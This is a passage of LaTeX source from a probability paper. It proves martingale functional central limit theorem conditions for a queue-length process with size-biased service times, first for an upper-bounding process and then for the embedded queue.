&= \Big(c_{n,\beta}\frac{\lambda}{n} \sum_{j\notin \served{i-1}} S_j^{1+\alpha} - 1 \Big)+ c_{n,\beta}\E_{\sss S}[S_{c(i)}\mid \mathcal F_{i-1}]\sum_{s\in\served{i-1}}\lambda\frac{S_s^{\alpha}}{n}.
\end{align}%
Note that the right-most term in \eqref{eq:ConditionedArrivalsFirstTerm} and the second term in \eqref{eq:ConditionedArrivalsFirst_U} cancel out. This cancellation is what makes the analysis of $N_n^{\scriptscriptstyle U}(\cdot)$ considerably easier than the analysis of $N_n(\cdot)$.
Moreover, Lemma \ref{lem:1+alphaConditionalMoment} implies that the third term in \eqref{eq:ConditionedArrivalsFirst_U} is also $o_{\mathbb P}(n^{-1/3})$.
\eqref{eq:conditioned_arrivals_first_eq} is then simplified to
\begin{align}\label{eq:conditioned_arrivals_final_expression}%
\E_{\sss S}[A^{\scriptscriptstyle U}_n(i) \mid \mathcal F_{i-1}] -1 &= c_{n,\beta}\frac{\lambda}{n} \sum_{j\notin \served{i-1}} S_j^{1+\alpha} - 1
+ o_{\mathbb P}(n^{-1/3})\notag\\
&= \Big(c_{n,\beta}\frac{\lambda}{n} \sum_{j=1}^n S_j^{1+\alpha} - 1\Big) - c_{n,\beta}\frac{\lambda}{n} \sum_{j\in \served{i-1}} S_j^{1+\alpha}
+ o_{\mathbb P}(n^{-1/3})\notag\\
&= \Big(c_{n,\beta}\frac{\lambda}{n} \sum_{j=1}^n S_j^{1+\alpha} - 1\Big) - c_{n,\beta}\frac{\lambda}{n} \sum_{j=1}^{i-1} S_{c(j)}^{1+\alpha}
+ o_{\mathbb P}(n^{-1/3}),
\end{align}%
and the $o_{\mathbb P}(n^{-1/3})$ term is uniform in $i=O(n^{2/3})$. We are now able to compute
\begin{align}%
n^{-1/3}C_n^{\scriptscriptstyle U}(tn^{2/3}) &= n^{-1/3}\sum_{i=1}^{tn^{2/3}}(\E_{\sss S}[A_n^{\scriptscriptstyle U}(i) \mid \mathcal F_{i-1}] -1) \notag\\
&= tn^{1/3} \Big(c_{n,\beta}\frac{\lambda}{n}\sum_{j=1}^n S_j^{1+\alpha} - 1\Big) - c_{n,\beta}\frac{\lambda}{n^{4/3}} \sum_{i=1}^{tn^{2/3}} \sum_{j=1}^{i-1} S_{c(j)}^{1+\alpha} + o_{\mathbb P}(1).
\end{align}%
Note that, since $\mathbb E[(S^{1+\alpha})^{\frac{2+\alpha}{1+\alpha}}]<\infty$, by the Marcinkiewicz and Zygmund Theorem \cite[Theorem 2.5.8]{durrett2010probability}, if $\alpha\in(0,1]$,
\begin{equation}%
c_{n,\beta}\frac{\lambda}{n}\sum_{j=1}^n S_j^{1+\alpha} = c_{n,\beta}\lambda\mathbb E[S^{1+\alpha}] + o_{\mathbb P}(n^{-\frac{1}{2+\alpha}})=1 + \beta n^{-1/3} + o_{\mathbb P}(n^{-\frac{1}{2+\alpha}}).
\end{equation}%
For $\alpha = 0$, by a similar result \cite[Theorem 2.5.7]{durrett2010probability}, for all $\varepsilon>0$,
\begin{equation}%
\frac{1}{n}\sum_{j=1}^n S_j = \mathbb E[S] + o_{\mathbb P}(n^{-1/2}\log(n)^{1/2+\varepsilon}).
\end{equation}%
In particular,
\begin{equation}%
tn^{1/3} \Big(c_{n,\beta}\frac{\lambda}{n}\sum_{j=1}^n S_j^{1+\alpha} - 1\Big) = t(\beta + o_{\mathbb P}(1)).
\end{equation}%
By monotonicity,
\begin{equation}%
\sup_{t\leq T}\Big\vert tn^{1/3} \Big(c_{n,\beta}\frac{\lambda}{n}\sum_{j=1}^n S_j^{1+\alpha} - 1\Big) - \beta t \Big\vert \sr{\mathbb P}{\rightarrow} 0,
\end{equation}%
so that, for $\alpha\in[0,1]$,
\begin{equation}\label{eq:drift_rescaled_final_expression}%
n^{-1/3}C_n^{\scriptscriptstyle U}(tn^{2/3}) = \beta t - c_{n,\beta}\frac{\lambda}{n^{4/3}} \sum_{i=1}^{tn^{2/3}} \sum_{j=1}^{i-1} S_{c(j)}^{1+\alpha} + o_{\mathbb P}(1).
\end{equation}%
Since $c_{n,\beta} = 1 + O(n^{-1/3})$, the second term in \eqref{eq:drift_rescaled_final_expression} converges uniformly to $-t^2\lambda\mathbb E[S^{1+2\alpha}]/2\mathbb E[S^{\alpha}]$ by Lemma \ref{lem:size_biased_service_times_unif_convergence}.
\subsubsection{Proof of \ref{size_biased:eq:second_condition_martingale_FCLT} for the upper bound}\label{sec:quadratic_variation_of_upper_bounding_process_converges_to_zero}
Rewrite $B_n^{\scriptscriptstyle U}(k)$, for $k = O(n^{2/3})$, as
\begin{align}\label{eq:quadratic_variation_zeroth_U}%
B_n^{\scriptscriptstyle U}(k) &= \sum_{i=1}^k(\E_{\sss S}[A_n^{\scriptscriptstyle U}(i)^2 \mid \mathcal F_{i-1}] - \E_{\sss S}[A_n^{\scriptscriptstyle U}(i)\vert \mathcal F_{i-1}]^2) \notag\\
&= \sum_{i=1}^k(\E_{\sss S}[A_n^{\scriptscriptstyle U}(i)^2 \mid \mathcal F_{i-1}] - 1) + O_{\mathbb P}(kn^{-1/3}),
\end{align}%
where we have used the asymptotics for $\E_{\sss S}[A_n^{\scriptscriptstyle U}(i) \mid \mathcal F_{i-1}]$ in \eqref{eq:conditioned_arrivals_final_expression}-\eqref{eq:drift_rescaled_final_expression}. Moreover, we can compute $\E_{\sss S}[A_n^{\scriptscriptstyle U}(i)^2 \mid \mathcal F_{i-1}]$ as
\begin{align}\label{eq:quadratic_variation_first_U}%
\E_{\sss S}[A_n^{\scriptscriptstyle U}(i)^2 \mid \mathcal F_{i-1}] &= \E_{\sss S}\Big[\Big(\sum_{h\notin\served{i}}\mathds{1}_{\{T_{h}\leq c_{n,\beta}S _{c(i)}S_h/n\}}\Big)^2 \mid \mathcal F_{i-1}\Big] \\
&= \E_{\sss S}[A_n^{\scriptscriptstyle U}(i) \mid \mathcal F_{i-1}] + \E_{\sss S}\Big[\sum_{h,q\notin \served{i}}\mathds{1}_{\{T_{h}\leq c_{n,\beta}S _{c(i)}S_h/n\}}\mathds{1}_{\{T_{q}\leq c_{n,\beta} S_{c(i)}S_q/n\}} \mid \mathcal F_{i-1}\Big].\notag
\end{align}%
Again by \eqref{eq:conditioned_arrivals_final_expression}, $\E_{\sss S}[A_n(i) \mid \mathcal F_{i-1}] = 1 + o_{\mathbb P}(1)$, uniformly in $i = O(n^{2/3})$, so that \eqref{eq:quadratic_variation_zeroth_U} simplifies to
\begin{equation}%
B_n(k) = \sum_{i=1}^k \E_{\sss S}\Big[\sum_{h,q\notin \served{i}}\mathds{1}_{\{T_{h}\leq c_{n,\beta}S _{c(i)}S_h^{\alpha}/n\}}\mathds{1}_{\{T_{q}\leq c_{n,\beta}S_{c(i)}S_q^{\alpha}/n\}} \mid \mathcal F_{i-1}\Big] + O_{\mathbb P}(kn^{-1/3}).
\end{equation}%
We then focus on the second term in \eqref{eq:quadratic_variation_first_U}, which we compute as
\begin{align}\label{eq:BComputations_U}%
\sum_{\substack{h,q\notin \served{i}\\h\neq q}}&\E_{\sss S}[\mathds{1}_{\{T_{h}\leq c_{n,\beta}S_{c(i)}S_h^{\alpha}/n\}}\mathds{1}_{\{T_{q}\leq c_{n,\beta}S_{c(i)}S_q^{\alpha}/n\}} \mid \mathcal F_{i-1}] \\
&= \sum_{j\notin\served{i-1}}\mathbb P_{\sss S}(c(i) = j \mid \mathcal F_{i-1})\sum_{\substack{h,q\notin \served{i-1}\cup \{j\}\\h\neq q}}\E_{\sss S}[\mathds{1}_{\{T_{h}\leq c_{n,\beta}S_{j}S_h^{\alpha}/n\}}\mathds{1}_{\{T_{q}\leq c_{n,\beta}S_{j}S_q^{\alpha}/n\}} \mid \mathcal F_{i-1}].\notag\\
\end{align}%
By Lemma \ref{lem:n_squared_err_term},
\begin{align}%
\textrm{l.h.s.}~\eqref{eq:BComputations_U}&= \sum_{j\notin\served{i-1}} \frac{S_j^{\alpha}}{\sum_{l\notin\served{i-1}}S_l^{\alpha}} \sum_{\substack{h,q\notin \served{i-1}\cup \{j\}\\h\neq q}}\Big(\frac{c_{n,\beta}^2\lambda^2 S_j^2S_h^{\alpha}S_q^{\alpha}}{n^2} + o_{\mathbb P}(n^{-2})\Big)\notag\\
&= (c_{n,\beta}\lambda) ^2\E_{\sss S}[S_{c(i)}^2 \mid \mathcal F_{i-1}]\frac{1}{n^{2}}\sum_{\substack{h,q\notin \served{i-1}\cup \{c(i)\}\\h\neq q}}S_h^{\alpha}S_q^{\alpha} + o_{\mathbb P}(1)\notag\\
&= \frac{(c_{n,\beta}\lambda) ^2}{n^2}\E_{\sss S}[S_{c(i)}^2 \mid \mathcal F_{i-1}]\!\sum_{\substack{1\leq h,q\leq n}}\!S_h^{\alpha}S_q^{\alpha} \notag\\
&\qquad- \frac{(c_{n,\beta}\lambda) ^2}{n^2}\E_{\sss S}\Big[S_{c(i)}^2\mkern-9mu\sum_{\substack{h,q\in \served{i-1} \cup \{c(i)\}\\ \cup \{h = q\}}}\mkern-9mu S_h^{\alpha}S_q^{\alpha} \mid \mathcal F_{i-1}\Big] + o_{\mathbb P}(1).\notag
\end{align}%
The leading contribution to $B_n^{\scriptscriptstyle U}(k)$ is given by the first term, while the second term is an error term by Lemma \ref{lem:unif_convergence_random_sums}. We have shown that $B_n^{\scriptscriptstyle U}(\cdot)$ can be rewritten as
\begin{align}%
B_n^{\scriptscriptstyle U}(k) = \Big(\frac{\lambda}{n}\sum_{h\in[n]}S_h^{\alpha}\Big)^2\sum_{i=1}^k \E_{\sss S}[S_{c(i)}^2 \mid \mathcal F_{i-1}] + o_{\mathbb P}(k).
\end{align}%
Thus,
\begin{equation}%
n^{-2/3}B_n^{\scriptscriptstyle U}(n^{2/3}u) \stackrel{\mathbb P}{\rightarrow} \lambda^2\mathbb E[S^{\alpha}]\mathbb E [S^{2+\alpha}]u,
\end{equation}%
which concludes the proof of \ref{size_biased:eq:second_condition_martingale_FCLT}.
\qed
\subsubsection{Proof of \ref{size_biased:eq:third_condition_martingale_FCLT} for the upper bound}\label{sec:quadratic_variation_jumps_bounding_process_converges_to_zero}
The jumps of $B_n^{\scriptscriptstyle U}(k)$ are given by
\begin{align}%
B_n^{\scriptscriptstyle U}(i)-B_n^{\scriptscriptstyle U}(i-1) &= \E_{\sss S}[A_n^{\scriptscriptstyle U}(i)^2 \mid \mathcal F_{i-1}] - \E_{\sss S}[A_n^{\scriptscriptstyle U}(i) \mid \mathcal F_{i-1}]^2\notag\\
&=\E_{\sss S}\Big[\sum_{\substack{h,q\notin \served{i}\\h\neq q}}\mathds{1}_{\{T_{h}\leq c_{n,\beta}S_{c(i)}S_h^{\alpha}/n\}}\mathds{1}_{\{T_{q}\leq c_{n,\beta}S _{c(i)}S_q^{\alpha}/n\}} \mid \mathcal F_{i-1}\Big]\notag\\
&\qquad+ \left(\E_{\sss S}[A_n^{\scriptscriptstyle U}(i) \mid \mathcal F _{i-1}] - \E_{\sss S}[A_n^{\scriptscriptstyle U}(i) \mid \mathcal F_{i-1}]^2\right)
\end{align}%
Since $\E_{\sss S}[A_n^{\scriptscriptstyle U}(i) \mid \mathcal F _{i-1}] = 1 + O_{\mathbb P}(n^{-1/3})$ for $i= O_{\mathbb P}(n^{2/3})$ by \eqref{eq:conditioned_arrivals_final_expression}, the second term is of order $O_{\mathbb P}(n^{-1/3})$, uniformly in $i = O_{\mathbb P}(n^{2/3})$. The first term was computed in \eqref{eq:BComputations_U}. Therefore,
\begin{align}%
&B_n^{\scriptscriptstyle U}(i) - B_n^{\scriptscriptstyle U}(i-1) \notag\\
&\quad = \frac{(c_{n,\beta}\lambda) ^2}{n^{2}}\E_{\sss S}[S_{c(i)}^2 \mid \mathcal F_{i-1}]\sum_{h,q\in[n]}S_h^{\alpha}S_q^{\alpha} - \frac{(c_{n,\beta}\lambda) ^2}{n^2}\E_{\sss S}\Big[S_{c(i)}^2\mkern-9mu\sum_{\substack{h,q\in \served{i-1}\cup \{c(i)\}\\ \cup \{h = q\}}}\mkern-9mu S_h^{\alpha}S_q^{\alpha} \mid \mathcal F_{i-1}\Big] + o_{\mathbb P}(1)\notag\\
&\quad \leq \frac{(c_{n,\beta}\lambda) ^2}{n^{2}}\E_{\sss S}[S_{c(i)}^2 \mid \mathcal F_{i-1}]\sum_{h,q\in [n]}S_h^{\alpha}S_q^{\alpha}.
\end{align}%
After rescaling and taking the expectation, we obtain the bound
\begin{equation}\label{eq:proof_of_iii_final_bound_U
n^{-2/3}\E_{\sss S}[\sup_{i\leq \bar t n^{2/3}}\vert B_n^{\scriptscriptstyle U}(i) - B_n^{\scriptscriptstyle U}(i-1)\vert]\leq \frac{(c_{n,\beta}\lambda)^2}{n^{2/3}}\E_{\sss S}[\sup_{i\leq \bar t n^{2/3}}S_{c(i)}^2] \Big(\frac{1}{n}\sum_{h,q\in[n]} S_h^{\alpha} \Big)^2.
\end{equation}%
\begin{lemma}\label{lem:exp_sup_S_squared_oP_n_two_thirds}%
If $\mathbb E[S^{2+\alpha}]<\infty$,
\begin{equation}%
\E_{\sss S}[\sup_{k\leq tn^{2/3}}S_{c(k)}^2] = o_{\mathbb P}(n^{2/3}).
\end{equation}%
\end{lemma}%
\begin{proof}
For $\varepsilon>0$ split the expectation as
\begin{align}\label{eq:first_way_beginning}%
\E_{\sss S} [(\sup_{k\leq tn^{2/3}}S_{c(k)})^2]\leq \E_{\sss S} [\sup_{k\leq tn^{2/3}}S_{c(k)}^2\mathds 1_{\{S_{c(k)}> \varepsilon n^{1/3}\}}] + \varepsilon^2 n^{2/3}.
\end{align}%
We bound the expected value in the first term as
\begin{align}%
\E_{\sss S} [\sup_{k\leq tn^{2/3}}S^2_{c(k)} \mathds 1_{\{S_{c(k)}> \varepsilon n^{1/3}\}}] &\leq \sum_{k\leq tn^{2/3}} \frac{1}{n^{2/3}}\E_{\sss S}[S_{c(k)}^2\mathds 1_{\{S_{c(k)}> \varepsilon n^{1/3}\}}]\notag\\
&\leq n^{2/3} t \E_{\sss S}[S_{c(1)}^2 \mathds 1_{\{S_{c(1)}> \varepsilon n^{1/3}\}}](1 + O_{\PS}(1)),
\end{align}%
where we used Lemma \ref{lem:expectation_service_times_ordering} with $f(x) = x^2\mathds 1_{\{x>\varepsilon n^{1/3}\}}$.
Computing the expectation explicitly we get
\begin{align}%
t \E_{\sss S}[S_{c(1)}^2 \mathds 1_{\{S_{c(1)}> \varepsilon n^{1/3}\}}] &= t \sum_{i\in[n]}S_i^2 \mathds 1_{\{S_{i}> \varepsilon n^{1/3}\}} \mathbb{P}( c(1) = i) \notag\\
&= t \sum_{i\in[n]}S_i^2 \mathds 1_{\{S_{i}> \varepsilon n^{1/3}\}}\frac{S_i^{\alpha}}{\sum_{j\in[n]} S_j^{\alpha}},
\end{align}%
so that the left-hand side of \eqref{eq:first_way_beginning} is bounded by
\begin{align}%
\frac{t}{\sum_{j\in[n]} S_j^{\alpha}} \sum_{i\in[n]} S_i^{2+\alpha}\mathds 1_{\{S_{i}> \varepsilon n^{1/3}\}} + \Big(\sum_{i\in[n]}\frac{S_i^{\alpha}}{n}\Big)^2\varepsilon^2,
\end{align}%
which tends to zero as $n\rightarrow\infty$ since $\mathbb E[S^{2+\alpha}] < \infty$ and $\varepsilon>0$ is arbitrary.
\end{proof}
By Lemma \ref{lem:exp_sup_S_squared_oP_n_two_thirds} the right-hand side of \eqref{eq:proof_of_iii_final_bound_U} converges to zero, and this concludes the proof.
\qed
\subsubsection{Proof of \ref{size_biased:eq:fourth_condition_martingale_FCLT} for the upper bound}\label{sec:martingale_jumps_bounding_process_converges_to_zero}
First we split
\begin{align}%
\E_{\sss S}[\sup_{k\leq tn^{2/3}}(M_n^{\scriptscriptstyle U}(k) - M_n^{\scriptscriptstyle U}(k-1))^2] &= \E_{\sss S}[\sup_{k\leq tn^{2/3}}(A_n^{\scriptscriptstyle U}(k) - \E_{\sss S}[A_n^{\scriptscriptstyle U}(k) \mid \mathcal F_{k-1}])^2]\notag\\
&\leq \E_{\sss S}[ \sup_{k\leq tn^{2/3}}\vert A_n^{\scriptscriptstyle U}(k)\vert^2] + \E_{\sss S}[\sup_{k\leq tn^{2/3}}\mathbb E[A_n^{\scriptscriptstyle U}(k) \mid \mathcal F_{k-1}]^2]\notag\\
&\leq 2\E_{\sss S} [ \sup_{k\leq tn^{2/3}}\vert A_n^{\scriptscriptstyle U}(k)\vert^2].
\end{align}%
We then stochastically dominate $(A_n^{\scriptscriptstyle U}(k))_{k\leq tn^{2/3}}$ by a sequence of Poisson processes $(\Pi_k)_{k\leq tn^{2/3}}$, according to
\begin{equation}\label{eq:expectation_sup_A_squared_start}%
A_n^{\scriptscriptstyle U}(k) \preceq \Pi_k\Big(c_{n,\beta} S_{c(k)}\sum_{i\in[n]} \frac{S_i^{\alpha}}{n}\Big)=:A'_n(k).
\end{equation}%
Indeed, if $E_1, E_2,\ldots, E_n$ are exponential random variables with parameters $\lambda_1, \lambda_2, \ldots, \lambda_n$, there exists a coupling with a Poisson process $\Pi(\cdot)$ such that $\sum_{i\leq n} \mathds 1_{\{E_i\leq t\}} \leq \Pi(\sum_{i\leq n}\lambda_i t)$. The coupling is constructed as follows. Each random variable $E_i$ is coupled with a Poisson process $\Pi^{(i)}$ with intensity $\lambda_i$ in such a way that $\mathds 1_{\{E_i\leq t\}} \leq \Pi^{(i)} (\lambda_i t)$. Moreover, by basic properties of the Poisson process $\sum_{i\leq n} \Pi^{(i)}(\lambda_i t) \stackrel{\mathrm d}{=} \Pi(\sum_{i\leq n} \lambda_i t)$.
We bound \eqref{eq:expectation_sup_A_squared_start} via martingale techniques. First, we decompose it as
\begin{align}\label{eq:expectation_sup_A_squared_martingale_decomposition}%
n^{-2/3}\E_{\sss S} [ \sup_{k\leq tn^{2/3}}\vert A^{\scriptscriptstyle U}_n(k)\vert^2] \leq &2n^{-2/3}\E_{\sss S} \Big[\Big(\sup_{k\leq tn^{2/3}} \Big\vert A'_n(k) - c_{n,\beta}S_{c(k)}\sum_{i\in[n]}\frac{S_i^{\alpha}}{n}\Big\vert\Big)^2\Big] \notag\\
&+ 2n^{-2/3}\E_{\sss S} \Big[\Big(c_{n,\beta}\sup_{k\leq tn^{2/3}} S_{c(k)}\sum_{i\in[n]} \frac{S_i^{\alpha}}{n}\Big)^2\Big]
\end{align}%
Applying Doob's $L^2$ martingale inequality \cite[Theorem 11.2]{klenke2008probability} to the first term we see that it converges to zero, since
\begin{align}%
n^{-2/3}\E_{\sss S} \Big[\Big(\sup_{k\leq tn^{2/3}}\vert A'_n(k) - S_{c(k)}\sum_{i\in[n]} \frac{S_i^{\alpha}}{n}\Big\vert\Big)^2\Big] &\leq 4n^{-2/3}\E_{\sss S}\Big[\Big\vert A'_n(tn^{2/3}) - S_{c(tn^{2/3})}\sum_{i\in[n]}\frac{S_i^{\alpha}}{n}\Big\vert^2\Big]\notag\\
&= 4n^{-2/3} \E_{\sss S} \Big[S_{c(tn^{2/3})}\sum_{i\in[n]}\frac{S_i^{\alpha}}{n}\Big].
\end{align}%
The last equality follows from the expression for the variance of a Poisson random variable. The right-most term converges to zero by Lemma \ref{lem:1+alphaConditionalMoment}. We now bound the second term in \eqref{eq:expectation_sup_A_squared_martingale_decomposition}, as
\begin{align}\label{eq:expectation_sup_A_squared_martingale_drift_estimate}%
n^{-2/3}\E_{\sss S} \Big[\Big(\sup_{k\leq tn^{2/3}} S_{c(k)}\sum_{i\in[n]} \frac{S_i^{\alpha}}{n}\Big)^2\Big] &= n^{-2/3}\Big(\sum_{i\in[n]} \frac{S_i^{\alpha}}{n}\Big)^2 \E_{\sss S} [(\sup_{k\leq tn^{2/3}}S_{c(k)})^2]
\end{align}%
By Lemma \ref{lem:exp_sup_S_squared_oP_n_two_thirds} the right-hand side of \eqref{eq:expectation_sup_A_squared_martingale_drift_estimate} converges to zero, concluding the proof of \ref{size_biased:eq:fourth_condition_martingale_FCLT}.
\qed
\subsection{Convergence of the scaling limit}
As a consequence of \eqref{eq:reflected_process_domination} and Theorem \ref{MainTheorem_U} we have that $Q_n(k) = O_{\mathbb P}(n^{1/3})$ for $k = O(n^{2/3})$. In fact, $n^{-1/3}Q_n(k)$ is tight when $k=O(n^{2/3})$, as the following lemma shows:
\begin{lemma}\label{lem:sup_Q_converges_to_zero}%
Fix $\bar t>0$. The sequence $n^{-1/3}\sup_{t\leq \bar t} Q_n(t n^{2/3})$ is tight.
\end{lemma}%
\begin{proof}
The supremum function $f(\cdot)\mapsto \sup_{t\leq \bar t}f(t)$ is continuous in $(\mathcal D, J_1)$ by \cite[Theorem 13.4.1]{StochasticProcess}. In particular,
\begin{equation}%
n^{-1/3}\sup_{t\leq \bar t} Q_n^{\scriptscriptstyle U}(t n^{2/3})\sr{\mathrm d}{\rightarrow}\sup_{t\leq \bar t} W(t),\qquad\mathrm{in}~(\mathcal D, J_1).
\end{equation}%
Since $Q_n(k) \leq Q_n^{\scriptscriptstyle U}(k)$, the conclusion follows.
\end{proof}%
As an immediate consequence of \eqref{eq:cardinality_nu} and Lemma \ref{lem:sup_Q_converges_to_zero}, we have the following important corollary. Recall that $\nu_i$ is the set of customers who have left the system or are in the queue at the beginning of the $i$-th service, so that $\vert \nu_i\vert = i + Q_n(i)$. Recall also that $0\leq Q_n(t) \leq Q_n^{\scriptscriptstyle U}(t)$.
\begin{corollary}\label{cor:nr_joined_customer_at_time_n_twothirds_is_n_twothirds}
As $n\rightarrow\infty$,
\begin{equation}%
\vert \nu_i \vert = i + o_{\mathbb P} (i), \qquad \mathrm{uniformly~in}~i= O_{\mathbb P} (n^{2/3}).
\end{equation}%
\end{corollary}
Intuitively, this implies that the main contribution to the downwards drift in the queue-length process comes from the customers that have left the system, and not from the customers in the queue. Alternatively, the order of magnitude of the queue length, that is $n^{1/3}$, is negligible with respect to the order of magnitude of the customers who have left the system, which is $n^{2/3}$.
In order to prove Theorem \ref{th:main_theorem_delta_G_1} we proceed as in the proof of Theorem \ref{MainTheorem_U}, but we now need to deal with the more complicated drift term. As before, we decompose $N_n(k) = M_n(k) + C_n(k)$, where
\begin{align}%
M_n(k) & = \sum_{i=1}^k (A_n(i) - \E_{\sss S}[A_n(i) \mid \mathcal F_{k-1}]),\notag\\
C_n(k) &= \sum_{i=1}^k (\E_{\sss S}[A_n(i) \mid \mathcal F_{k-1}] -1),\notag\\
B_n(k) &= \sum_{i=1}^k (\E_{\sss S}[A_n(i)^2 \mid \mathcal F_{i-1}] - \E_{\sss S}[A_n(i) \mid \mathcal F_{i-1}]^2).
\end{align}%
As before, we separately prove the convergence of the drift $C_n(k)$ and of the martingale $M_n(k)$, by verifying the conditions \ref{size_biased:eq:first_condition_martingale_FCLT}-\ref{size_biased:eq:fourth_condition_martingale_FCLT} in Section \ref{sec:proof_thm_U}.
Verifying \ref{size_biased:eq:first_condition_martingale_FCLT} proves to be the most challenging task, while the estimates for \ref{size_biased:eq:second_condition_martingale_FCLT}-\ref{size_biased:eq:fourth_condition_martingale_FCLT} in Section \ref{sec:proof_thm_U} carry over without further complications.
\subsubsection{Proof of \ref{size_biased:eq:first_condition_martingale_FCLT} for the embedded queue}
By expanding $\E_{\sss S}[A_n(i) \mid \mathcal F_{i-1}] -1$ as in \eqref{eq:ConditionedArrivalsFirst_U}, we get
\begin{align}\label{eq:ConditionedArrivalsFirst}%
\E_{\sss S}[A_n(i) \mid \mathcal F_{i-1}] -1&= \Big(c_{n,\beta}\lambda\frac{\sum_{l=1}^n S_l^{\alpha}}{n}\E_{\sss S}[S_{c(i)} \mid \mathcal F_{i-1}]-1\Big) - c_{n,\beta}\E_{\sss S}[S_{c(i)} \mid \mathcal F_{i-1}]\sum_{l\in\nu_{i}\setminus \{c(i)\}}\lambda\frac{S_l^{\alpha}}{n} \notag\\
&\quad- c_{n,\beta}\frac{\lambda}{n}\E_{\sss S}[S_{c(i)}^{1+\alpha} \mid \mathcal F_{i-1}]+ o_{\mathbb P}(n^{-1/3}).
\end{align}%
By further expanding the first term in \eqref{eq:ConditionedArrivalsFirst} as in \eqref{eq:ConditionedArrivalsFirstTerm}, we get
\begin{align}\label{eq:conditioned_arrivals_middle_computation}%
\E_{\sss S}[A_n(i) \mid \mathcal F_{i-1}] - 1 &= \Big(c_{n,\beta} \frac{\lambda}{n}\sum_{j\notin\served{i-1}}S_j^{1+\alpha}-1\Big) - c_{n,\beta}\E_{\sss S}[S_{c(i)} \mid \mathcal F_{i-1}] \sum_{l=i+1}^{i+1+Q_n(i-1)} \lambda \frac{S_{c(l)}^{\alpha}}{n} \notag\\
&\quad- c_{n,\beta}\frac{\lambda}{n}\E_{\sss S}[S_{c(i)}^{1+\alpha} \mid \mathcal F_{i-1}] + o_{\mathbb P}(n^{-1/3}),
\end{align}%
where in the first equality we have used \eqref{eq:cardinality_nu}. Comparing equation \eqref{eq:conditioned_arrivals_middle_computation} with equation \eqref{eq:conditioned_arrivals_final_expression}, we rewrite the drift as
\begin{equation}%
C_n(k) = C_n^{\scriptscriptstyle U}(k) - c_{n,\beta}\lambda\sum_{i=1}^{k}\E_{\sss S}[S_{c(i)} \mid \mathcal F_{i-1}] \sum_{l=i+1}^{i+1+Q_n(i-1)} \frac{S_{c(l)}^{\alpha}}{n}.
\end{equation}%
Therefore, to conclude the proof of \ref{size_biased:eq:first_condition_martingale_FCLT} it is enough to show that the second term vanishes, after rescaling. We do this in the following lemma:
\begin{lemma}\label{lem:difficult_drift_term_converges_to_zero}
As $n\rightarrow\infty$,
\begin{equation}%
n^{-1/3}c_{n,\beta}\lambda\sum_{i=1}^{\bar t n^{2/3}}\E_{\sss S}[S_{c(i)} \mid \mathcal F_{i-1}] \sum_{l=i+1}^{i+1+Q_n(i-1)} \frac{S_{c(l)}^{\alpha}}{n} \sr{\mathbb P}{\rightarrow} 0.
\end{equation}%
\end{lemma}
\begin{proof}%
By Lemma \ref{lem:sup_Q_converges_to_zero}, $\sup_{i\leq \bar t n^{2/3}}Q_n(i)\leq C_1 n^{1/3}$ w.h.p.~for a large constant $C_1$, and by Lemma \ref{lem:1+alphaConditionalMoment}, $\sup_{i\leq \bar tn^{2/3}}\E_{\sss S}[S_{c(i)} \mid \mathcal F_{i-1}]\leq C_2$ w.h.p.~for another large constant $C_2$. This implies that, w.h.p.,
\begin{equation}%
n^{-1/3}c_{n,\beta}\lambda\sum_{i=1}^{\bar t n^{2/3}}\E_{\sss S}[S_{c(i)} \mid \mathcal F_{i-1}] \sum_{l=i+1}^{i+1+Q_n(i-1)} \frac{S_{c(l)}^{\alpha}}{n} \leq c_{n,\beta}\lambda C_2 \sum_{i=1}^{\bar t n^{2/3}}\sum_{l=i+1}^{i+1+C_1n^{1/3}}\frac{S_{c(l)}^{\alpha}}{n^{4/3}}.
\end{equation}%
The double sum can be rewritten as
\begin{align}%
c_{n,\beta}\lambda C_2 \sum_{i=1}^{\bar t n^{2/3}}\sum_{l=i+1}^{i+1+C_1n^{1/3}}\frac{S_{c(l)}^{\alpha}}{n^{4/3}} &\leq c_{n,\beta}\lambda C_2 \sum_{j=1}^{\bar tn^{2/3}+C_1n^{1/3}}\min\{j, C_1 n^{1/3}\}\frac{S^{\alpha}_{c(j)}}{n^{4/3}}\notag\\
&\leq c_{n,\beta}\lambda C_1 C_2 \sum_{j=1}^{(\bar t+C_1)n^{2/3}} \frac{S^{\alpha}_{c(j)}}{n}.
\end{align}%
The right-most term converges to zero in probability as $n\rightarrow\infty$ by Lemma \ref{lem:size_biased_service_times_unif_convergence}. This concludes the proof.
\end{proof}%
Since
\begin{equation}%
n^{-1/3}C_n(tn^{2/3}) = n^{-1/3}C_n^{\scriptscriptstyle U}(tn^{2/3}) - n^{-1/3}c_{n,\beta}\lambda\sum_{i=1}^{tn^{2/3}}\E_{\sss S}[S_{c(i)} \mid \mathcal F_{i-1}] \sum_{l=i+1}^{i+1+Q_n(i-1)} \frac{S_{c(l)}^{\alpha}}{n},
\end{equation}%
Lemma \ref{lem:difficult_drift_term_converges_to_zero} and the convergence result \eqref{eq:drift_rescaled_final_expression} for $ n^{-1/3}C_n^{\scriptscriptstyle U}(tn^{2/3})$ conclude the proof of \ref{size_biased:eq:first_condition_martingale_FCLT}.
\qed
\subsubsection{Proof of \ref{size_biased:eq:second_condition_martingale_FCLT}, \ref{size_biased:eq:third_condition_martingale_FCLT} and \ref{size_biased:eq:fourth_condition_martingale_FCLT} for the embedded queue}
Proceeding as before, we find that
\begin{align}\label{eq:quadratic_variation_zeroth}%
B_n(k) &= \sum_{i=1}^k(\E_{\sss S}[A_n(i)^2 \mid \mathcal F_{i-1}] - \E_{\sss S}[A_n(i) \mid \mathcal F_{i-1}]^2) \notag\\
&= \sum_{i=1}^k(\E_{\sss S}[A_n(i)^2 \mid \mathcal F_{i-1}] - 1) + O_{\mathbb P}(kn^{-1/3}),
\end{align}%
where
\begin{equation}\label{eq:quadratic_variation_first}%
\E_{\sss S}[A_n(i)^2 \mid \mathcal F_{i-1}] = \E_{\sss S}[A_n(i)\mid \mathcal F_{i-1}] + \E_{\sss S}\Big[\sum_{\substack{h,q\notin \nu_{i-1}\\h\neq q}}\mathds{1}_{\{T_{h}\leq S _{c(i)}S_h/n\}}\mathds{1}_{\{T_{q}\leq S_{c(i)}S_q/n\}} \mid \mathcal F_{i-1}\Big].
\end{equation}%
Similarly as in Section \ref{sec:quadratic_variation_of_upper_bounding_process_converges_to_zero}, we get
\begin{align}\label{eq:BComputations}%
\sum_{\substack{h,q\notin \nu_{i-1}\\h\neq q}}&\E_{\sss S}[\mathds{1}_{\{T_{h}\leq S_{c(i)}S_h^{\alpha}/n\}}\mathds{1}_{\{T_{q}\leq S_{c(i)}S_q^{\alpha}/n\}} \mid \mathcal F_{i-1}] \\
